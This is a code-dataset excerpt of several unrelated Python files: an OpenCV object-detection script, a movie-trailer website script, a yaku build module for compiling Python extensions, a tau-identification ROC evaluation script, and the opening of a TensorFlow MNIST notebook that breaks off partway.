detection.shape[2]):\n conf = detection[0, 0, i, 2]\n indx = int(detection[0, 0, i, 1])\n if conf <= 0:\n continue\n box = detection[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n startX, startY = max(0, startX), max(0, startY)\n endX, endY = min(endX, w), min(endY, h)\n box = Box(charDic[indx], int(startX), int(startY),\n int(endX - startX), int(endY - startY), conf=conf)\n boxes.append(box)\n boxes =sorted(boxes, key=lambda box: box.conf)\n return boxes[0] if len(boxes) > 0 else \"None\"\n\ndef getMakeBox(orgImg):\n large_box = getLargeMakeBox(orgImg)\n if large_box==\"None\":\n return \"None\",\"None\"\n org_H, org_W = orgImg.shape[:2]\n\n (x, y, w, h) = large_box.x, large_box.y, large_box.width, large_box.height\n mid_x,mid_y = x+w//2,y+h/2\n\n scale = 1\n x1,y1 = max(0,mid_x-w*scale),max(0,mid_y-h*scale)\n x2,y2 = min(mid_x+w*scale,org_W),min(mid_y+h*scale,org_H)\n x1,y1,x2,y2=list(map(int,[x1,y1,x2,y2]))\n w,h = int(w*scale*2),int(h*scale*2)\n #再在小图上检测\n small_image = orgImg[y1:y2,x1:x2].copy()\n\n blob=cv2.dnn.blobFromImage(small_image,0.007843,(400,400),127.5,False,False)\n net_large.setInput(blob,\"data\")\n detection=net_large.forward(\"detection_out\")\n boxes=[]\n for i in np.arange(0,detection.shape[2]):\n conf=detection[0,0,i,2]\n indx = int(detection[0, 0, i, 1])\n if conf<=0:\n continue\n box=detection[0,0,i,3:7]*np.array([w,h,w,h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n startX, startY = max(0, startX), max(0, startY)\n endX, endY = min(endX, w), min(endY, h)\n box = Box(charDic[indx], int(startX), int(startY),\n int(endX - startX), int(endY - startY), conf=conf)\n boxes.append(box)\n boxes=sorted(boxes,key=lambda box:-box.conf)\n if len(boxes)<=0:\n return \"None\",large_box\n boxes[0].x += x1\n boxes[0].y += y1\n return boxes[0],large_box\n\nif __name__ == '__main__':\n dir=\"Images/make_large\"\n for image_name in os.listdir(dir):\n image_path = os.path.join(dir,image_name)\n image = cv2.imread(image_path)\n box,large_box = getMakeBox(image)\n print(box,large_box)\n if large_box != \"None\":\n (x, y, w, h) = large_box.x, large_box.y, large_box.width, large_box.height\n cv2.rectangle(image, (x, y), (x + w, y + h), (0,255, 0))\n\n if box != \"None\":\n (x, y, w, h) = box.x, box.y, box.width, box.height\n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255))\n\n cv2.imshow(\"image\",image)\n cv2.waitKey()","sub_path":"LabelTool_attributes/LabelTool_attributes_V2/getMake.py","file_name":"getMake.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"451726040","text":"import media\r\nimport fresh_tomatoes\r\n\r\ntoy_story = media.Movie(\"Toy Story\",\r\n \"A story of a boy and his toys come to life\",\r\n \"http://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\",\r\n \"https://www.youtube.com/watch?v=vxyZH85NQC4\")\r\n\r\n#print(toy_story.storyline)\r\n\r\navatar = media.Movie(\"Avatar\",\r\n \"A story of some blue aliens\",\r\n \"http://upload.wikimedia.org/wikipedia/id/b/b0/Avatar-Teaser-Poster.jpg\",\r\n \"https://www.youtube.com/watch?v=vxyZH85NQC4\")\r\n\r\n#print(avatar.title)\r\n\r\n#toy_story.show_trailer()\r\n\r\ninception = media.Movie(\"Inception\",\r\n \"Dreaming in dreams\",\r\n \"http://t2.gstatic.com/images?q=tbn:ANd9GcRo9vfJCM6dzPkZHIHBVCtlJnAnew9Ai26kEdrli0-tfmatmciD\",\r\n \"https://www.youtube.com/watch?v=YoHD9XEInc0\")\r\n\r\n#inception.show_trailer()\r\n\r\nschool_of_rock = media.Movie(\"School of Rock\",\r\n \"Using rock music to learn\",\r\n \"http://upload.wikimedia.org/wikipedia/en/1/11/School_of_Rock_Poster.jpg\",\r\n \"https://www.youtube.com/watch?v=vxyZH85NQC4\")\r\n\r\nratatoulli = media.Movie(\"Ratatouille\",\r\n \"A rat is a chef in Paris\",\r\n \"http://upload.wikimedia.org/wikipedia/en/5/50/RatatouillePoster.jpg\",\r\n \"https://www.youtube.com/watch?v=vxyZH85NQC4\")\r\n\r\nhunger_games = media.Movie(\"Hunger Games\",\r\n \"A really real reality show\",\r\n \"http://upload.wikimedia.org/wikipedia/en/4/42/HungerGamesPoster.jpg\",\r\n \"https://www.youtube.com/watch?v=vxyZH85NQC4\")\r\nmovies = [toy_story, avatar, inception, school_of_rock, ratatoulli, hunger_games]\r\n#fresh_tomatoes.open_movies_page(movies)\r\n\r\n# Testing class variable valid_ratings\r\n#print(media.Movie.VALID_RATINGS)\r\nprint(\"media.Movie.__?__\")\r\nprint(\"The name of the class is \"+media.Movie.__name__)\r\nprint(\"The name of the module is \"+media.Movie.__module__)\r\n\r\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"255802399","text":"import sys\nimport os\nimport copy\nimport distutils\nimport distutils.sysconfig\nimport re\nimport warnings\n\nfrom subprocess \\\n import \\\n Popen, PIPE, STDOUT\n\nfrom yaku.task_manager \\\n import \\\n topo_sort, build_dag, \\\n CompiledTaskGen, set_extension_hook\nfrom yaku.sysconfig \\\n import \\\n get_configuration, detect_distutils_cc\nfrom yaku.compiled_fun \\\n import \\\n compile_fun\nfrom yaku.task \\\n import \\\n Task\nfrom yaku.utils \\\n import \\\n ensure_dir\nfrom yaku.conftests \\\n import \\\n check_compiler, check_header\n\nimport yaku.tools\n\npylink, pylink_vars = compile_fun(\"pylink\", \"${PYEXT_SHLINK} ${PYEXT_LINK_TGT_F}${TGT[0].abspath()} ${PYEXT_LINK_SRC_F}${SRC} ${PYEXT_APP_LIBDIR} ${PYEXT_APP_LIBS} ${PYEXT_APP_FRAMEWORKS} ${PYEXT_SHLINKFLAGS}\", False)\n\npycc, pycc_vars = compile_fun(\"pycc\", \"${PYEXT_CC} ${PYEXT_CFLAGS} ${PYEXT_INCPATH} ${PYEXT_CC_TGT_F}${TGT[0].abspath()} ${PYEXT_CC_SRC_F}${SRC}\", False)\n\npycxx, pycxx_vars = compile_fun(\"pycxx\", \"${PYEXT_CXX} ${PYEXT_CXXFLAGS} ${PYEXT_INCPATH} ${PYEXT_CXX_TGT_F}${TGT[0].abspath()} ${PYEXT_CXX_SRC_F}${SRC}\", False)\n\npycxxlink, pycxxlink_vars = compile_fun(\"pycxxlink\", \"${PYEXT_CXXSHLINK} ${PYEXT_LINK_TGT_F}${TGT[0].abspath()} ${PYEXT_LINK_SRC_F}${SRC} ${PYEXT_APP_LIBDIR} ${PYEXT_APP_LIBS} ${PYEXT_APP_FRAMEWORKS} ${PYEXT_SHLINKFLAGS}\", False)\n\n# pyext env <-> sysconfig env conversion\n\n_SYS_TO_PYENV = {\n \"PYEXT_SHCC\": \"CC\",\n \"PYEXT_CCSHARED\": \"CCSHARED\",\n \"PYEXT_SHLINK\": \"LDSHARED\",\n \"PYEXT_SUFFIX\": \"SO\",\n \"PYEXT_CFLAGS\": \"CFLAGS\",\n \"PYEXT_OPT\": \"OPT\",\n \"PYEXT_LIBDIR\": \"LIBDIR\",\n}\n\n_PYENV_REQUIRED = [\n \"LIBDIR_FMT\",\n \"LIBS\",\n \"LIB_FMT\",\n \"CPPPATH_FMT\",\n \"CC_TGT_F\",\n \"CC_SRC_F\",\n \"LINK_TGT_F\",\n \"LINK_SRC_F\",\n]\n\n_SYS_TO_CCENV = {\n \"CC\": \"CC\",\n \"SHCC\": \"CCSHARED\",\n \"SHLINK\": \"LDSHARED\",\n \"SO\": \"SO\",\n \"CFLAGS\": \"CFLAGS\",\n \"OPT\": \"OPT\",\n \"LIBDIR\": \"LIBDIR\",\n \"LIBDIR_FMT\": \"LIBDIR_FMT\",\n \"LIBS\": \"LIBS\",\n \"LIB_FMT\": \"LIB_FMT\",\n \"CPPPATH_FMT\": \"CPPPATH_FMT\",\n \"CC_TGT_F\": \"CC_TGT_F\",\n \"CC_SRC_F\": \"CC_SRC_F\",\n \"CXX\": \"CXX\",\n \"CXXSHLINK\": \"CXXSHLINK\",\n}\n\ndef setup_pyext_env(ctx, cc_type=\"default\", use_distutils=True):\n pyenv = {}\n if use_distutils:\n if cc_type == \"default\":\n dist_env = get_configuration()\n else:\n dist_env = get_configuration(cc_type)\n else:\n dist_env = {\n \"CC\": [\"clang\"],\n \"CPPPATH\": [],\n \"BASE_CFLAGS\": [\"-fno-strict-aliasing\"],\n \"OPT\": [],\n \"SHARED\": [\"-fPIC\"],\n \"SHLINK\": [\"clang\", \"-shared\"],\n \"LDFLAGS\": [],\n \"LIBDIR\": [],\n \"LIBS\": [],\n \"SO\": \".so\"}\n dist_env[\"CPPPATH\"].append(distutils.sysconfig.get_python_inc())\n\n for name, value in dist_env.items():\n pyenv[\"PYEXT_%s\" % name] = value\n pyenv[\"PYEXT_FMT\"] = \"%%s%s\" % dist_env[\"SO\"]\n pyenv[\"PYEXT_CFLAGS\"] = pyenv[\"PYEXT_BASE_CFLAGS\"] + \\\n pyenv[\"PYEXT_OPT\"] + \\\n pyenv[\"PYEXT_SHARED\"]\n pyenv[\"PYEXT_SHLINKFLAGS\"] = dist_env[\"LDFLAGS\"]\n return pyenv\n\ndef pycc_hook(self, node):\n tasks = pycc_task(self, node)\n self.object_tasks.extend(tasks)\n return tasks\n\ndef pycc_task(self, node):\n base = self.env[\"CC_OBJECT_FMT\"] % node.name\n target = node.parent.declare(base)\n ensure_dir(target.abspath())\n\n task = Task(\"pycc\", inputs=[node], outputs=[target])\n task.gen = self\n task.env_vars = pycc_vars\n task.env = self.env\n task.func = pycc\n return [task]\n\ndef pycxx_hook(self, node):\n tasks = pycxx_task(self, node)\n self.object_tasks.extend(tasks)\n self.has_cxx = True\n return tasks\n\ndef pycxx_task(self, node):\n base = self.env[\"CXX_OBJECT_FMT\"] % node.name\n target = node.parent.declare(base)\n ensure_dir(target.abspath())\n\n task = Task(\"pycxx\", inputs=[node], outputs=[target])\n task.gen = self\n task.env_vars = pycxx_vars\n task.env = self.env\n task.func = pycxx\n return [task]\n\ndef pylink_task(self, name):\n objects = [tsk.outputs[0] for tsk in self.object_tasks]\n if len(objects) < 1:\n warnings.warn(\"task %s has no inputs !\" % name)\n def declare_target():\n folder, base = os.path.split(name)\n tmp = folder + os.path.sep + self.env[\"PYEXT_FMT\"] % base\n return self.bld.src_root.declare(tmp)\n target = declare_target()\n ensure_dir(target.abspath())\n\n task = Task(\"pylink\", inputs=objects, outputs=[target])\n task.gen = self\n task.func = pylink\n task.env_vars = pylink_vars\n self.link_task = task\n\n return [task]\n\n# XXX: fix merge env location+api\nfrom yaku.tools.ctasks import _merge_env\nclass PythonBuilder(object):\n def clone(self):\n return PythonBuilder(self.ctx)\n\n def __init__(self, ctx):\n self.ctx = ctx\n self.env = copy.deepcopy(ctx.env)\n self.compiler_type = \"default\"\n self.use_distutils = True\n\n def extension(self, name, sources, env=None):\n sources = [self.ctx.src_root.find_resource(s) for s in sources]\n return create_pyext(self.ctx, name, sources,\n _merge_env(self.env, env))\n\ndef get_builder(ctx):\n return PythonBuilder(ctx)\n\nCC_SIGNATURE = {\n \"gcc\": re.compile(\"gcc version\"),\n \"msvc\": re.compile(\"Microsoft \\(R\\) 32-bit C/C\\+\\+ Optimizing Compiler\")\n}\n\ndef detect_cc_type(ctx, cc_cmd):\n cc_type = None\n\n def detect_type(vflag):\n cmd = cc_cmd + [vflag]\n try:\n p = Popen(cmd, stdout=PIPE, stderr=STDOUT)\n out = p.communicate()[0].decode()\n for k, v in CC_SIGNATURE.items():\n m = v.search(out)\n if m:\n return k\n except OSError:\n pass\n return None\n\n sys.stderr.write(\"Detecting CC type... \")\n if sys.platform == \"win32\":\n for v in [\"\", \"-v\"]:\n cc_type = detect_type(v)\n else:\n for v in [\"-v\", \"-V\", \"-###\"]:\n cc_type = detect_type(v)\n if cc_type:\n break\n if cc_type is None:\n cc_type = \"cc\"\n sys.stderr.write(\"%s\\n\" % cc_type)\n return cc_type\n\ndef get_distutils_cc_exec(ctx, compiler_type=\"default\"):\n from distutils import ccompiler\n\n sys.stderr.write(\"Detecting distutils CC exec ... \")\n if compiler_type == \"default\":\n compiler_type = \\\n distutils.ccompiler.get_default_compiler()\n\n compiler = ccompiler.new_compiler(compiler=compiler_type)\n if compiler_type == \"msvc\":\n compiler.initialize()\n cc = [compiler.cc]\n else:\n cc = compiler.compiler_so\n sys.stderr.write(\"%s\\n\" % \" \".join(cc))\n return cc\n\ndef configure(ctx):\n # How we do it\n # 1: for distutils-based configuration\n # - get compile/flags flags from sysconfig\n # - detect yaku tool name from CC used by distutils:\n # - get the compiler executable used by distutils ($CC\n # variable)\n # - try to determine yaku tool name from $CC\n # - apply necessary variables from yaku tool to $PYEXT_\n # \"namespace\"\n compiler_type = ctx.builders[\"pyext\"].compiler_type\n\n if ctx.builders[\"pyext\"].use_distutils:\n dist_env = setup_pyext_env(ctx, compiler_type)\n ctx.env.update(dist_env)\n\n cc_exec = get_distutils_cc_exec(ctx, compiler_type)\n yaku_cc_type = detect_cc_type(ctx, cc_exec)\n\n _setup_compiler(ctx, yaku_cc_type)\n else:\n dist_env = setup_pyext_env(ctx, compiler_type, False)\n ctx.env.update(dist_env)\n _setup_compiler(ctx, compiler_type)\n\ndef _setup_compiler(ctx, cc_type):\n old_env = ctx.env\n ctx.env = {}\n cc_env = None\n sys.path.insert(0, os.path.dirname(yaku.tools.__file__))\n try:\n try:\n mod = __import__(cc_type)\n mod.setup(ctx)\n except ImportError:\n raise RuntimeError(\"No tool %s is available (import failed)\" \\\n % cc_type)\n\n # XXX: this is ugly - find a way to have tool-specific env...\n cc_env = ctx.env\n finally:\n sys.path.pop(0)\n ctx.env = old_env\n\n copied_values = [\"CPPPATH_FMT\", \"LIBDIR_FMT\", \"LIB_FMT\",\n \"CC_OBJECT_FMT\", \"CC_TGT_F\", \"CC_SRC_F\", \"LINK_TGT_F\",\n \"LINK_SRC_F\"]\n for k in copied_values:\n ctx.env[\"PYEXT_%s\" % k] = cc_env[k]\n\n def setup_cxx():\n old_env = ctx.env\n ctx.env = {}\n sys.path.insert(0, os.path.dirname(yaku.tools.__file__))\n try:\n mod = __import__(\"gxx\")\n mod.setup(ctx)\n cxx_env = ctx.env\n finally:\n sys.path.pop(0)\n ctx.env = old_env\n\n for k in [\"CXX\", \"CXXFLAGS\", \"CXX_TGT_F\", \"CXX_SRC_F\",\n \"CXXSHLINK\"]:\n ctx.env[\"PYEXT_%s\" % k] = cxx_env[k]\n setup_cxx()\n\ndef create_pyext(bld, name, sources, env):\n base = name.replace(\".\", os.sep)\n\n tasks = []\n\n task_gen = CompiledTaskGen(\"pyext\", bld, sources, name)\n task_gen.bld = bld\n old_hook = set_extension_hook(\".c\", pycc_hook)\n old_hook_cxx = set_extension_hook(\".cxx\", pycxx_hook)\n\n task_gen.env = env\n apply_cpppath(task_gen)\n apply_libpath(task_gen)\n apply_libs(task_gen)\n apply_frameworks(task_gen)\n\n tasks = task_gen.process()\n\n ltask = pylink_task(task_gen, base)\n if task_gen.has_cxx:\n task_gen.link_task.func = pycxxlink\n task_gen.link_task.env_vars = pycxxlink_vars\n\n tasks.extend(ltask)\n for t in tasks:\n t.env = task_gen.env\n\n set_extension_hook(\".c\", old_hook)\n set_extension_hook(\".cxx\", old_hook_cxx)\n bld.tasks.extend(tasks)\n\n outputs = []\n for t in ltask:\n outputs.extend(t.outputs)\n task_gen.outputs = outputs\n return tasks\n\n# FIXME: find a way to reuse this kind of code between tools\ndef apply_frameworks(task_gen):\n # XXX: do this correctly (platform specific tool config)\n if sys.platform == \"darwin\":\n frameworks = task_gen.env[\"PYEXT_FRAMEWORKS\"]\n task_gen.env[\"PYEXT_APP_FRAMEWORKS\"] = []\n for framework in frameworks:\n task_gen.env[\"PYEXT_APP_FRAMEWORKS\"].extend([\"-framework\", framework])\n else:\n task_gen.env[\"PYEXT_APP_FRAMEWORKS\"] = []\n\ndef apply_libs(task_gen):\n libs = task_gen.env[\"PYEXT_LIBS\"]\n task_gen.env[\"PYEXT_APP_LIBS\"] = [\n task_gen.env[\"PYEXT_LIB_FMT\"] % lib for lib in libs]\n\ndef apply_libpath(task_gen):\n libdir = task_gen.env[\"PYEXT_LIBDIR\"]\n #implicit_paths = set([\n # os.path.join(task_gen.env[\"BLDDIR\"], os.path.dirname(s))\n # for s in task_gen.sources])\n implicit_paths = []\n libdir = list(implicit_paths) + libdir\n task_gen.env[\"PYEXT_APP_LIBDIR\"] = [\n task_gen.env[\"PYEXT_LIBDIR_FMT\"] % d for d in libdir]\n\ndef apply_cpppath(task_gen):\n cpppaths = task_gen.env[\"PYEXT_CPPPATH\"]\n implicit_paths = set([s.parent.srcpath() \\\n for s in task_gen.sources])\n srcnode = task_gen.sources[0].ctx.srcnode\n\n relcpppaths = []\n for p in cpppaths:\n if not os.path.isabs(p):\n node = srcnode.find_node(p)\n assert node is not None, \"could not find %s\" % p\n relcpppaths.append(node.bldpath())\n else:\n relcpppaths.append(p)\n cpppaths = list(implicit_paths) + relcpppaths\n task_gen.env[\"PYEXT_INCPATH\"] = [\n task_gen.env[\"PYEXT_CPPPATH_FMT\"] % p\n for p in cpppaths]\n","sub_path":"bento/private/_yaku/yaku/tools/pyext.py","file_name":"pyext.py","file_ext":"py","file_size_in_byte":11668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"494839704","text":"#!/usr/bin/env python\n\nimport argparse\nparser = argparse.ArgumentParser(description='Apply training and store results.')\nparser.add_argument('--input-taus', required=True, type=str, help=\"Input file with taus\")\nparser.add_argument('--input-other', required=False, default=None, type=str, help=\"Input file with non-taus\")\nparser.add_argument('--other-type', required=True, type=str, help=\"Type of non-tau objects\")\nparser.add_argument('--deep-results', required=True, type=str, help=\"Directory with deepId results\")\nparser.add_argument('--setup', required=True, type=str, help=\"Path to the file with the plot setup definition\")\nparser.add_argument('--setup-args', required=False, default='', type=str,\n help=\"Comma separated arguments for the plot setup module. E.g. arg1=value1,arg2=value2 etc.\")\nparser.add_argument('--weights', required=False, default=None, type=str,\n help=\"Directory with weights to correct the spectrum\")\nparser.add_argument('--prev-deep-results', required=False, default=None, type=str,\n help=\"Directory with previous deepId results\")\nparser.add_argument('--deep-results-label', required=False, default='', type=str,\n help=\"Label for deepId results\")\nparser.add_argument('--prev-deep-results-label', required=False, default='', type=str,\n help=\"Label for deepId results\")\nparser.add_argument('--output', required=True, type=str, help=\"Output pdf file\")\nparser.add_argument('--draw-wp', action=\"store_true\", help=\"Draw working points for raw discriminators\")\nparser.add_argument('--store-json', action=\"store_true\", help=\"Store ROC curves in JSON format\")\nparser.add_argument('--inequality-in-title', action=\"store_true\",\n help=\"Use inequality in the title to define pt range, instead of an interval\")\nparser.add_argument('--public-plots', action=\"store_true\", help=\"Apply public plot styles\")\n\nargs = parser.parse_args()\n\nimport os\nimport sys\nimport math\nimport pandas\nimport numpy as np\nimport json\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport eval_tools\nimport common\n\ndef AddPredictionsToDataFrame(df, file_name, label = ''):\n df_pred = pandas.read_hdf(file_name)\n for out in common.match_suffixes:\n if out != 'tau':\n tau_vs_other = common.TauLosses.tau_vs_other(df_pred['deepId_tau'].values, df_pred['deepId_' + out].values)\n df['deepId{}_vs_{}'.format(label, out)] = pandas.Series(tau_vs_other, index=df.index)\n df['deepId{}_{}'.format(label, out)] = pandas.Series(df_pred['deepId_' + out].values, index=df.index)\n return df\n\ndef AddWeightsToDataFrame(df, file_name):\n df_weights = pandas.read_hdf(file_name)\n df['weight'] = pandas.Series(df_weights.weight.values, index=df.index)\n return df\n\ndef CreateDF(file_name, tau_types, setup_provider):\n df = eval_tools.ReadBrancesToDataFrame(file_name, 'taus', all_branches)\n base_name = os.path.basename(file_name)\n pred_file_name = os.path.splitext(base_name)[0] + '_pred.h5'\n AddPredictionsToDataFrame(df, os.path.join(args.deep_results, pred_file_name))\n if args.weights is not None:\n weight_file_name = os.path.splitext(base_name)[0] + '_weights.h5'\n AddWeightsToDataFrame(df, os.path.join(args.weights, weight_file_name))\n else:\n df['weight'] = pandas.Series(np.ones(df.shape[0]), index=df.index)\n has_prev_results = len(args.prev_deep_results_label) > 0 and 'None' not in args.prev_deep_results_label\n if has_prev_results:\n AddPredictionsToDataFrame(df, os.path.join(args.prev_deep_results, pred_file_name),\n args.prev_deep_results_label)\n df['tau_pt'] = pandas.Series(df.tau_pt *(1000 - 20) + 20, index=df.index)\n if hasattr(setup_provider, \"DefineBranches\"):\n df = setup_provider.DefineBranches(df, tau_types)\n sel = None\n for tau_type in tau_types:\n tau_sel = df['gen_{}'.format(tau_type)] == 1\n if sel is None:\n sel = tau_sel\n else:\n sel = sel | tau_sel\n if sel is not None:\n df = df[sel]\n return df\n\nif sys.version_info.major > 2:\n import importlib.util\n spec = importlib.util.spec_from_file_location('setup_provider', args.setup)\n setup_provider = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(setup_provider)\nelse:\n import imp\n setup_provider = imp.load_source('setup_provider', args.setup)\n\nsetup_args = {}\nsetup_args_list = [ s.strip() for s in args.setup_args.split(',') if len(s.strip()) > 0 ]\nfor setup_arg in setup_args_list:\n split_arg = setup_arg.split('=')\n if len(split_arg) != 2:\n raise RuntimeError('Invalid setup argumetn = \"{}\".'.format(setup_arg))\n setup_args[split_arg[0]] = split_arg[1]\n\nsetup_provider.Initialize(eval_tools, setup_args)\n\ndiscriminators = setup_provider.GetDiscriminators(args.other_type, args.deep_results_label,\n args.prev_deep_results_label)\n\ncore_branches = [ 'tau_pt', 'tau_decayModeFinding', 'tau_decayMode', 'gen_{}'.format(args.other_type), 'gen_tau',\n 'tau_charge', 'lepton_gen_charge' ]\n\nall_branches = []\nall_branches.extend(core_branches)\nif hasattr(setup_provider, 'setup_branches'):\n all_branches.extend(setup_provider.setup_branches)\nfor disc in discriminators:\n if disc.from_tuple:\n all_branches.append(disc.column)\n if disc.wp_column != disc.column:\n all_branches.append(disc.wp_column)\n\nif args.input_other is None:\n df_all = CreateDF(args.input_taus, ['tau', args.other_type], setup_provider)\nelse:\n df_taus = CreateDF(args.input_taus, ['tau'], setup_provider)\n df_other = CreateDF(args.input_other, [args.other_type], setup_provider)\n df_all = df_taus.append(df_other)\nif hasattr(setup_provider, 'ApplySelection'):\n df_all = setup_provider.ApplySelection(df_all, args.input_other)\n\npt_bins = setup_provider.GetPtBins()\n\nplot_setup = setup_provider.GetPlotSetup(args.other_type)\n\nroc_json = []\n\nwith PdfPages(args.output) as pdf:\n for pt_index in range(len(pt_bins) - 1):\n df_tx = df_all[(df_all.tau_pt > pt_bins[pt_index]) & (df_all.tau_pt < pt_bins[pt_index + 1])]\n if df_tx.shape[0] == 0:\n print(\"Warning: pt bin ({}, {}) is empty.\".format(pt_bins[pt_index], pt_bins[pt_index + 1]))\n continue\n n_discr = len(discriminators)\n rocs = [None] * n_discr\n wp_rocs = [None] * n_discr\n names = [ disc.name for disc in discriminators ]\n\n roc_json_entry = {\n 'pt_min': pt_bins[pt_index], 'pt_max': pt_bins[pt_index + 1], 'discriminators': [], 'plot_setup': { },\n }\n\n for param_name in [ 'ylabel', 'yscale', 'ratio_yscale', 'legend_loc', 'ratio_ylabel_pad']:\n val = getattr(plot_setup, param_name)\n if val is not None:\n roc_json_entry['plot_setup'][param_name] = val\n\n x_range = 1\n for lim_name in [ 'x', 'y', 'ratio_y' ]:\n lim = getattr(plot_setup, lim_name + 'lim')\n if lim is not None:\n lim = lim[pt_index] if type(lim[0]) == list else lim\n roc_json_entry['plot_setup'][lim_name + '_min'] = lim[0]\n roc_json_entry['plot_setup'][lim_name + '_max'] = lim[1]\n if lim_name == 'x':\n x_range = lim[1] - lim[0]\n\n for n in reversed(range(n_discr)):\n ref_roc = rocs[-1]\n rocs[n], wp_rocs[n] = discriminators[n].CreateRocCurve(df_tx, ref_roc)\n if rocs[n].auc_score is not None:\n #target_prs = [0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 0.95, 0.99, 0.995 ]\n #thrs = [ find_threshold(rocs[n].pr[1, :], rocs[n].thresholds, pr) for pr in target_prs ]\n print('[{}, {}] {} roc_auc = {}'.format(pt_bins[pt_index], pt_bins[pt_index + 1], names[n],\n rocs[n].auc_score))\n #print(thrs)\n #print(discriminators[n].name)\n name_suffix = ''\n for roc in [ rocs[n].Prune(tpr_decimals=max(0, round(math.log10(1000 / x_range)))), wp_rocs[n] ]:\n if roc is None: continue\n\n discr_data = {\n 'name': discriminators[n].name + name_suffix,\n 'false_positive_rate': eval_tools.FloatList(roc.pr[0, :].tolist()),\n 'true_positive_rate': eval_tools.FloatList(roc.pr[1, :].tolist()),\n 'is_ref': n == n_discr - 1,\n 'color': roc.color,\n 'auc_score': roc.auc_score,\n 'dots_only': roc.dots_only,\n 'dashed': roc.dashed,\n 'marker_size': roc.marker_size,\n }\n if roc.thresholds is not None:\n discr_data['thresholds'] = eval_tools.FloatList(roc.thresholds.tolist())\n if roc.pr_err is not None:\n discr_data['false_positive_rate_up'] = eval_tools.FloatList(roc.pr_err[0, 0, :].tolist())\n discr_data['false_positive_rate_down'] = eval_tools.FloatList(roc.pr_err[0, 1, :].tolist())\n discr_data['true_positive_rate_up'] = eval_tools.FloatList(roc.pr_err[1, 0, :].tolist())\n discr_data['true_positive_rate_down'] = eval_tools.FloatList(roc.pr_err[1, 1, :].tolist())\n roc_json_entry['discriminators'].insert(0, discr_data)\n name_suffix = ' WP'\n\n\n fig, (ax, ax_ratio) = plt.subplots(2, 1, figsize=(7, 7), sharex=True,\n gridspec_kw = {'height_ratios':[3, 1]})\n\n plot_entries = []\n for n in range(n_discr):\n entry = rocs[n].Draw(ax, ax_ratio)\n plot_entries.append(entry)\n for n in range(n_discr):\n if wp_rocs[n] is not None:\n wp_rocs[n].Draw(ax, ax_ratio)\n\n ratio_title = 'MVA/DeepTau' if args.other_type != 'mu' else 'cut based/DeepTau'\n plot_setup.Apply(names, plot_entries, pt_index, ratio_title, ax, ax_ratio)\n\n roc_json_entry['plot_setup']['ratio_title'] = ratio_title\n roc_json_entry['period'] = '2017 (13 TeV)'\n if args.public_plots:\n header_y = 1.02\n # ax.text(0.03, 0.90, r'$p_T\\in ({}, {})$ GeV'.format(pt_bins[pt_index], pt_bins[pt_index + 1]),\n # fontsize=14, transform=ax.transAxes)\n if pt_bins[pt_index + 1] == 1000:\n pt_text = r'$p_T > {}$ GeV'.format(pt_bins[pt_index])\n elif pt_bins[pt_index] == 20:\n pt_text = r'$p_T < {}$ GeV'.format(pt_bins[pt_index + 1])\n else:\n pt_text = r'$p_T\\in ({}, {})$ GeV'.format(pt_bins[pt_index], pt_bins[pt_index + 1])\n roc_json_entry['pt_text'] = pt_text\n ax.text(0.03, 0.92 - n_discr * 0.10, pt_text, fontsize=14, transform=ax.transAxes)\n ax.text(0.01, header_y, 'CMS', fontsize=14, transform=ax.transAxes, fontweight='bold',\n fontfamily='sans-serif')\n ax.text(0.12, header_y, 'Simulation Preliminary', fontsize=14, transform=ax.transAxes, fontstyle='italic',\n fontfamily='sans-serif')\n ax.text(0.73, header_y, '2017 (13 TeV)', fontsize=13, transform=ax.transAxes, fontweight='bold',\n fontfamily='sans-serif')\n else:\n if args.inequality_in_title and (pt_bins[pt_index] == 20 or pt_bins[pt_index + 1] == 1000) \\\n and not (pt_bins[pt_index] == 20 and pt_bins[pt_index + 1] == 1000):\n if pt_bins[pt_index] == 20:\n title_str = 'tau vs {}. pt < {} GeV'.format(args.other_type, pt_bins[pt_index + 1])\n else:\n title_str = 'tau vs {}. pt > {} GeV'.format(args.other_type, pt_bins[pt_index])\n else:\n title_str = 'tau vs {}. pt range ({}, {}) GeV'.format(args.other_type, pt_bins[pt_index],\n pt_bins[pt_index + 1])\n roc_json_entry['pt_text'] = title_str\n ax.set_title(title_str, fontsize=18, y=1.04)\n plt.subplots_adjust(hspace=0)\n pdf.savefig(fig, bbox_inches='tight')\n roc_json.append(roc_json_entry)\n\nif args.store_json:\n with open(os.path.splitext(args.output)[0] + '.json', 'w') as json_file:\n json_file.write(json.dumps(roc_json, indent=4, cls=eval_tools.CustomJsonEncoder))\n","sub_path":"Training/python/evaluate_performance.py","file_name":"evaluate_performance.py","file_ext":"py","file_size_in_byte":12615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"454865570","text":"\n# coding: utf-8\n\n# # Tensorflow Demo: MNIST for Experts\n# \n# Before start using this, please select `Cell` - `All Output` - `Clear` to clear the old results. See [TensorFlow Tutorial](https://www.tensorflow.org/versions/master/tutorials/mnist/beginners/index.html) for details of the tutorial.\n\n# # Loading MNIST training data\n# \n\n# In[1]:\n\n# Import tensorflow\nimport tensorflow as tf\nimport os\nimport numpy as np\n\n# import MNIST data\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom tensorflow.contrib.learn.python.learn.datasets import base\n#mnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import random_seed\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread\n\n\n# In[ ]:\n\n\n\n\n# In[2]:\n\n# class DataSet(object):\n\n# def __init__(self,\n# images,\n# labels,\n# fake_data=False,\n# one_hot=False,\n# dtype=dtypes.float32,\n# 